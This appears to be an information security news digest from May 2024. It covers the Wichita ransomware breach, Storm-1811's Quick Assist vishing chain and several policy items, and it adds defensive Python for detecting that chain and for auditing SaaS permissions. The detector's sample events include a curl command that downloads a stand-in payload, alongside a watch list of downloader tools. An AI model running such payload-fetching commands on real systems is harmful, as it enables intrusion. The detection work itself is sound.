Project Hyphae

Information Security News 5-20-2024


Wichita Cyber Attack: Social Security Numbers, Drivers Licenses, Payment Info Compromised

Article Link:

  • The City of Wichita, KS suffered a ransomware attack that compromised police and traffic records and exposed personal information including Social Security numbers, names, driver’s license numbers, and payment card details. The breach occurred between May 3 and 4; the city took its systems offline on May 5 as a precaution against malware spreading across its networks. At the time of writing, the Wichita network remains offline.
  • LockBit claimed responsibility for the attack and threatened to release the stolen personal data on the dark web; the city has not confirmed any contact regarding ransom demands.
  • City operations were disrupted. With the online payment system unavailable, the city offered free bus rides and paused water shutoffs as temporary measures.
  • Wichita residents are advised to monitor their personal information and watch for suspicious activity on their accounts, using the resources provided by the major credit bureaus.

Cybercriminals Exploiting Microsoft’s Quick Assist Feature in Ransomware Attacks

Article Link:

  • Microsoft observed the cybercriminal group Storm-1811 abusing the Quick Assist remote-assistance tool in social engineering attacks. Storm-1811, known for deploying Black Basta ransomware, impersonates trusted entities to deceive victims.
  • The attack chain involves vishing, installation of remote monitoring and management tools, and delivery of QakBot, Cobalt Strike, and finally Black Basta ransomware. Attackers pose as tech support or internal IT to persuade the victim to grant a Quick Assist session, which gives them their initial foothold on the device.
  • Once the victim grants access via Quick Assist, attackers run commands to download malicious payloads, then deploy the ransomware across the network using PsExec.
  • Microsoft is working on adding warning messages to Quick Assist to alert users to potential scams.
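The chain above (Quick Assist session, payload download, PsExec lateral movement) is what a detection engineer would want to correlate rather than alert on Quick Assist alone, since helpdesks use it legitimately. The following is an added example written for this digest, not Microsoft's or the article's code. The event records are constructed, and the downloader list, the PSEXESVC service-name match and the two-hour window are assumptions chosen for the example rather than a published rule.

```python
"""Correlate a Quick Assist session with follow-on download and PsExec activity.

Added detection example illustrating the Storm-1811 chain described above; it
is not Microsoft's or the article's code. The event records are constructed,
and the downloader list, service-name match and correlation window are
assumptions chosen for this example rather than a published detection rule.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed telemetry: process-creation records (Sysmon EID 1 style) and a
# service-install record (System log EID 7045 style). Paths are illustrative.
EVENTS = [
    {"host": "WS01", "ts": "2024-05-13T14:02:10", "type": "process",
     "image": r"C:\Windows\System32\QuickAssist.exe", "cmdline": "QuickAssist.exe"},
    {"host": "WS01", "ts": "2024-05-13T14:09:45", "type": "process",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\ProgramData\update.zip https://203.0.113.5/update.zip"},
    {"host": "WS01", "ts": "2024-05-13T14:31:02", "type": "service",
     "service_name": "PSEXESVC", "image_path": r"%SystemRoot%\PSEXESVC.exe"},
    # Helpdesk used Quick Assist on WS02; nothing suspicious followed.
    {"host": "WS02", "ts": "2024-05-13T15:10:00", "type": "process",
     "image": r"C:\Windows\System32\QuickAssist.exe", "cmdline": "QuickAssist.exe"},
    # curl on WS03 with no preceding Quick Assist session: not correlated.
    {"host": "WS03", "ts": "2024-05-13T16:00:00", "type": "process",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe https://intranet.corp.example/ping"},
]

DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe"}  # assumed list
WINDOW = timedelta(hours=2)  # assumed: how long after the session we keep correlating


def _basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def correlate(events, window=WINDOW):
    """Return {host: [stages]} for hosts where a Quick Assist session was followed,
    within the window, by a payload download and/or a PsExec service install."""
    by_host = defaultdict(list)
    for ev in events:
        by_host[ev["host"]].append(ev)
    findings = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        session_start, stages = None, []
        for ev in evs:
            ts = datetime.fromisoformat(ev["ts"])
            if ev["type"] == "process" and _basename(ev["image"]) == "quickassist.exe":
                session_start, stages = ts, ["quick_assist_session"]  # (re)start a session
                continue
            if session_start is None or ts - session_start > window:
                continue  # no recent session on this host: nothing to correlate against
            if (ev["type"] == "process" and _basename(ev["image"]) in DOWNLOADERS
                    and "http" in ev["cmdline"].lower()
                    and "payload_download" not in stages):
                stages.append("payload_download")
            elif (ev["type"] == "service" and ev["service_name"].upper() == "PSEXESVC"
                    and "psexec_service_install" not in stages):
                stages.append("psexec_service_install")
        if len(stages) > 1:  # a session alone is not a finding
            findings[host] = stages
    return findings


def severity(stages):
    """Assumed triage mapping: full chain is high, partial chain is medium."""
    full = "payload_download" in stages and "psexec_service_install" in stages
    return "high" if full else "medium"


if __name__ == "__main__":
    for host, stages in correlate(EVENTS).items():
        print(host, severity(stages), " -> ".join(stages))
```

Only WS01 is reported: the Quick Assist session on WS02 with no follow-on activity and the curl on WS03 with no preceding session both stay quiet, which is the point of correlating the stages rather than alerting on any one of them.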

Low-Tech Tactics Still Top the IT Security Risk Chart

Article Link:

  • Despite advances in cybersecurity, low-tech attack methods such as USB-based attacks, QR code phishing, and social engineering remain effective and pose significant threats. USB-based attacks, aided by social engineering, have resurged, with attackers distributing fake company-branded drives and toys with built-in USB drives to get inside target systems.
  • QR code exploitation is also on the rise, targeting people who are not wary of the risks QR codes carry. Even routine tasks such as QR code authentication can be abused.
  • Cybercriminals are using generative AI tools to sharpen social engineering lures, making attacks more persuasive and harder to detect.
  • Human error continues to be a significant factor in cyber incidents, underscoring the importance of ongoing awareness training and education.

Vermont Cracks Down on Personal Data Use with New Data Privacy Law

Article Link:

  • Vermont legislators passed an extensive data privacy law, dubbed the Vermont Data Privacy Act, which is considered one of the strongest in the U.S.
  • The law empowers individuals to sue companies for privacy violations and imposes significant restrictions on data collection and usage, particularly banning the sale of sensitive personal information like driver’s license numbers, health records, and financial data.
  • The law’s passage is expected to impact how major tech companies like Facebook, Google, and Amazon handle consumer data and address data breaches. It may also prompt other states to enforce similar legislation, extending protections to consumers nationwide and potentially leading to class-action lawsuits against tech companies.
  • Link to Additional Information:
  • Link to Full Text (House Bill 121):

A SaaS Security Challenge: Getting Permissions All in One Place

Article Link:

  • SaaS platforms such as Microsoft 365, Salesforce, and Workday offer fine-grained permissions that dictate user access based on roles, tasks, projects, and custom settings. Managing all of these permissions becomes complex for administrators because there is no unified place to review and manage them.
  • CISOs and admins face significant challenges because of this complexity, and need a solution that provides full visibility into user permissions in order to enforce company policy effectively.
  • A centralized permissions inventory is crucial to a strong SaaS security strategy: it helps reduce the attack surface, identify unnecessary user permissions, manage non-human access, and detect privilege abuse.
  • Building a permissions inventory is essential for any organization adopting SaaS, and future tools are expected to offer a single dashboard for efficient permissions management.
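What a centralized inventory actually buys you is shown best by building a small one. The following is an added example written for this digest, not the article's or any vendor's code. It normalises three constructed per-app exports into one grant list and then runs the three checks the article names: unnecessary (stale) admin grants, non-human access holding admin roles, and one principal holding admin across many apps. The export shapes, field names, role list, 90-day staleness threshold and the three-app threshold are all assumptions; real tenants return different schemas, but the mapping step is the same.

```python
"""Build one permissions inventory from several SaaS exports and flag risky grants.

Added example illustrating the centralized inventory described above; it is
not the article's or any vendor's code. The export shapes, field names, role
list and thresholds are assumptions chosen for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import date, timedelta

AS_OF = date(2024, 5, 20)  # review date for the constructed data


@dataclass(frozen=True)
class Grant:
    """One normalised permission grant, whatever platform it came from."""
    app: str
    principal: str
    kind: str        # "human" or "service" (non-human access)
    role: str
    last_used: date


ADMIN_ROLES = {  # assumed: the roles this organisation treats as privileged
    "Global Administrator", "Exchange Administrator", "System Administrator",
    "Security Administrator", "Integration Administrator",
}

# Constructed exports. Field names loosely imitate each platform; they are not real API schemas.
M365_EXPORT = [
    {"upn": "jdoe@corp.example", "roles": ["Global Administrator"], "lastSignIn": "2024-05-10", "servicePrincipal": False},
    {"upn": "asmith@corp.example", "roles": ["User"], "lastSignIn": "2024-05-12", "servicePrincipal": False},
    {"upn": "backup-svc@corp.example", "roles": ["Exchange Administrator"], "lastSignIn": "2023-11-01", "servicePrincipal": True},
]
SALESFORCE_EXPORT = [
    {"Username": "jdoe@corp.example", "ProfileName": "System Administrator", "LastLoginDate": "2024-05-11", "IsIntegrationUser": False},
    {"Username": "rlee@corp.example", "ProfileName": "System Administrator", "LastLoginDate": "2024-01-15", "IsIntegrationUser": False},
]
WORKDAY_EXPORT = [
    {"account": "jdoe@corp.example", "securityGroups": ["Security Administrator"], "lastActivity": "2024-05-09", "integrationSystemUser": False},
    {"account": "hr-integration", "securityGroups": ["Integration Administrator"], "lastActivity": "2024-05-13", "integrationSystemUser": True},
]


def _kind(non_human_flag):
    return "service" if non_human_flag else "human"


def build_inventory():
    """Map each platform's export into the common Grant shape (one row per role)."""
    inv = []
    for r in M365_EXPORT:
        for role in r["roles"]:
            inv.append(Grant("M365", r["upn"], _kind(r["servicePrincipal"]), role,
                             date.fromisoformat(r["lastSignIn"])))
    for r in SALESFORCE_EXPORT:
        inv.append(Grant("Salesforce", r["Username"], _kind(r["IsIntegrationUser"]),
                         r["ProfileName"], date.fromisoformat(r["LastLoginDate"])))
    for r in WORKDAY_EXPORT:
        for role in r["securityGroups"]:
            inv.append(Grant("Workday", r["account"], _kind(r["integrationSystemUser"]), role,
                             date.fromisoformat(r["lastActivity"])))
    return inv


def review(inventory, today=AS_OF, stale_days=90, cross_app_threshold=3):
    """Run the three checks over the unified inventory and return the findings."""
    cutoff = today - timedelta(days=stale_days)
    admin = [g for g in inventory if g.role in ADMIN_ROLES]
    findings = {
        # admin role not exercised in stale_days: candidate for removal
        "stale_admin": sorted((g.app, g.principal) for g in admin if g.last_used < cutoff),
        # non-human identities holding admin: review scope and credential handling
        "service_admin": sorted((g.app, g.principal) for g in admin if g.kind == "service"),
    }
    apps_per_principal = defaultdict(set)
    for g in admin:
        apps_per_principal[g.principal].add(g.app)
    # one person who is admin everywhere is a single point of compromise
    findings["multi_app_admin"] = sorted(
        p for p, apps in apps_per_principal.items() if len(apps) >= cross_app_threshold)
    return findings


if __name__ == "__main__":
    for check, hits in review(build_inventory()).items():
        print(check, hits)
```

The non-human flag comes straight from each platform's own attribute here; an export that lacks one needs a naming convention or an identity-provider lookup to classify accounts, and that classification is usually the hardest part of the inventory in practice.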

SEC to Require Financial Firms to have Data Breach Incident Plans

Article Link:

  • The SEC has introduced new regulations requiring specific financial institutions, including broker-dealers, funding portals, investment companies, registered investment advisers, and transfer agents, to establish a comprehensive plan for managing data breaches involving customer data.
  • The listed institutions must develop and maintain written procedures for detecting and responding to data breaches, and must promptly notify affected customers with details about the breach and the data that was compromised.
  • Notifications to impacted customers must be sent within a short window: no later than 30 days after the institution becomes aware of the breach.
  • This initiative by the SEC highlights the importance of proactive monitoring and reporting in strengthening cybersecurity and protecting consumer interests.
  • Link to the SEC’s New Rules:
  • Link to the SEC’s Announcement:

The Fall of the National Vulnerability Database

Article Link:

  • The National Vulnerability Database (NVD), overseen by NIST, has largely stopped enriching new CVE entries since February 12, raising concerns about its effectiveness.
  • Three factors have undermined the NVD’s ability to classify vulnerabilities effectively: a large number of inexperienced researchers seeking recognition, which has lowered report quality; global accessibility, which has increased contributions but also brought in low-quality reports and exploitation on the dark web; and bug bounty programs that reward quantity over quality, flooding vendors with reports that are often irrelevant or false positives.
  • Vendors now struggle to sort through the volume of low-quality reports, which diverts attention from meaningful research and undermines vulnerability management efforts.
  • The CVE program introduced CVE Numbering Authorities (CNAs) to spread the increased load of assigning identifiers, but the NVD’s manual enrichment process did not scale with it, and enrichment of new vulnerabilities has effectively halted.
